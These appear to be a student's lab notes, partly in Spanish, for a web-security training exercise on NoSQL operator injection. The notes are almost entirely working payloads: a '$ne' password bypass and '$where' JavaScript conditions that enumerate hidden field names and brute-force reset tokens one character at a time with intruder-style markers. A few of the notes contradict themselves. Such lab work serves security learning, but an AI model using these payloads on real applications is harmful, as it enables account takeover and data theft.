04 Lab: Exploiting NoSQL operator injection to extract unknown fields

{
<pos 0> "_id" : 'xxxxxx',
<pos 1> "username":"carlos",
<pos 2> "password":{"$ne":"invalid"},
<pos 3> "posible_campo" : 'valor_campo'
}

"$where":"function(){ if (Object.keys(this)[1].match('username')) return 1; else 0;}"
"$where":"function(){ if (Object.keys(this)[1].length == 6 ) return 1; else 0;}"

{
"username":"carlos",
"password":{"$ne":"invalid"},
"$where": "1"

}

"$where":"function(){ if (Object.keys(this)[3].length == 6 ) return 1; else 0;}"
Asi que tiene 5 caracteres

"$where":"function(){ if (Object.keys(this)[3].match(/^$a$/)) return 1; else 0;}"
Vamos a sacar con esto el primer caracter, y asi lo hacemos sucesivamente
Campo del usuario: email

a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
0
1
2
3
4
5
6
7
8
9

// hidden field name is "mail"
"$where":"function(){ if (this.email.length == 1 ) return 1; else 0;}"
// Son 25 caracteres
"$where":"function(){ if (this.email.match(/^$a$/)) return 1; else 0;}"
"$where":"function(){ if (this.email.match('^.{$NUMBER$}$CARACTER$.*')) return 1; else 0;}"
"$where":"function(){ if (this.email.match('^.{§1§}§A§.*')) return 1; else 0;}"

{§§}§§
('^.{§§}§§.*')

[email protected]

unlockToken

{"username":"carlos","password":{"$ne":"invalid"},
"$where":"function(){ if (Object.keys(this)[4].length == §6§ ) return 1; else 0;}"
}
Son 11 caracteres

"$where":"function(){ if (Object.keys(this)[4].match(/^$a$/)) return 1; else 0;}"
unlockToken
9457f5cff38fff0b

"$where":"function(){ if (Object.keys(this)[4].match(/^f§a§/)) return 1; else 0;}"
"$where":"function(){ if (Object.keys(this)[4].match('^.{§1§}§1§.*')) return 1; else 0;}"
forgotPwd
"$where":"function(){ if (this.forgotPwd.match(/^$a$/)) return 1; else 0;}"
"$where":"function(){ if (this.forgotPwd.match('^.{§1§}§A§.*')) return 1; else 0;}"
db10648a240ccfa1